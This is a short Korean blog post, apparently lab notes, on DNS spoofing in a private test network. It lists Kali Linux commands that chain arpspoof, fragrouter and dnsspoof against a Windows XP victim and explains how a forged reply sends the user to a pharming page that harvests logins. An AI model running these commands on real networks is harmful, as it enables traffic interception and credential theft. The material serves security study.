kjh00n의 기록저장소

DNS Spoofing 실습 본문

네트워크 보안 운영

DNS Spoofing 실습

kjh00n 2024. 12. 12. 15:47

Kali Linux (192.168.50.200)

apy -y install apache2

systemctl start apache2

Kali Linux에서 파일 생성

vim domain
arpspoof -i eth0 -t 192.168.50.150 192.168.50.2
fragrouter -B1
dnsspoof -i eth0 -f domain
XP에서 사이트 접속할 때의 기록

XP (192.168.50.150)

Apache2로 뜨지만 만약 이 페이지가 해커가 만든 파밍홈페이지였으면 여지없이 속아서 아이디와 비밀번호가 유출된다

해커의 IP도 응답하고 진짜 goole도 응답을하는데 해커가 먼저 응답을 해서 해커의 파밍페이지가 나오게 되는거다.

먼저 도착하는 데이터가 출력되기 때문에 순서가 중요해진다.

'네트워크 보안 운영' 카테고리의 다른 글

DHCP Starvation 실습 (yersinia와 dhcpig)  (0) 2024.12.12
DHCP Attack  (0) 2024.12.12
DNS Attack  (0) 2024.12.12
TCP Session Hijacking 실습  (0) 2024.12.12
TCP Session Hijacking  (0) 2024.12.12